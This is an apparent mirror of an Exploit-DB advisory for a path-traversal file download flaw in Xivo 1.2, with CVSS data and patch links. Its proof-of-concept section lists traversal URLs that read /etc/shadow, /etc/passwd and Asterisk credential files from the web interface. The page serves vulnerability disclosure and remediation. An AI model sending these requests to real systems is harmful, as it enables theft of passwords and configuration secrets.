header-logo
Suggest Exploit
vendor:
Xivo
by:
Mr.Un1k0d3r
7,5
CVSS
HIGH
Arbitrary File Download
22
CWE
Product Name: Xivo
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: YES
Related CWE: N/A
CPE: a:xivo:xivo
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux xivo 2.6.32-5-486
2012

Xivo 1.2 Arbitrary File Download under root privileges

Using the web interface of Xivo 1.2, an attacker can download any file from the system as the web application is running under root privileges. This can allow an attacker to download clear text passwords, /etc/passwd, /etc/shadow and many more.

Mitigation:

The vulnerability was fixed in the last patched version of Xivo 1.2. The patch can be found at https://projects.xivo.fr/issues/3912 and http://git.xivo.fr/?p=official/xivo-skaro.git;a=commit;h=127ab43e6d8e8ed94f16ff388fb62fd611a40e19.
Source

Exploit-DB raw data:

Xivo 1.2 Arbitrary File Download under root privileges
===============================================================

Date: 6/11/2012
Exploit Author: Mr.Un1k0d3r
Vendor Homepage: https://wiki.xivo.fr
Software Link: https://wiki.xivo.fr/index.php/XiVO_1.1-Gallifrey/Install_XiVO_With_CD
Version: 1.2 (last patched version)
Tested on: Linux xivo 2.6.32-5-486

Exploit:
Using the web interface you can download any file from the system. The web application is running under root privileges. 
You can download clear text password, /etc/passwd, /etc/shadow and many more...

POC:
https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/passwd
https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/shadow 
https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/asterisk/manager.conf
https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/asterisk/cel_pgsql.conf

This vulnerability was discover by Mr.Un1k0d3r From RingZer0 Team.

Exploit-DB Note:
This appears to have been fixed
https://projects.xivo.fr/issues/3912
http://git.xivo.fr/?p=official/xivo-skaro.git;a=commit;h=127ab43e6d8e8ed94f16ff388fb62fd611a40e19

Navigation

Suggest Exploit

Services By CQR